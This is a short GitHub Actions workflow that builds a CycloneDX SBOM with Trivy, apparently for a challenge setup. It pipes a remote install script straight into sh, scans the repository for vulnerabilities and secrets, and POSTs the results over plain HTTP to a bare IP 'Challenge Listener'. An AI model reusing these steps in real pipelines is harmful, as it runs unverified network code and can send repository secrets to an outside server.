name: CycloneDX SBOM with Trivy

on:
  push:
    branches: [ master ]
  workflow_dispatch:

jobs:
  generate-sbom:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Install Trivy
      run: |
        curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin

    - name: Generate CycloneDX SBOM with vulnerabilities
      run: |
        mkdir -p sbom-results
        trivy fs . --scanners vuln,secret --format cyclonedx --output sbom-results/sbom.json || true

    - name: Send SBOM to Challenge Listener
      run: |
        if [ -f sbom-results/sbom.json ]; then
        curl -X POST -H "Content-Type: application/json" \
        --data @sbom-results/sbom.json \
        http://35.219.182.3:8880/callback
        else
        echo "SBOM file not found. Skipping callback."
        exit 1
        fi
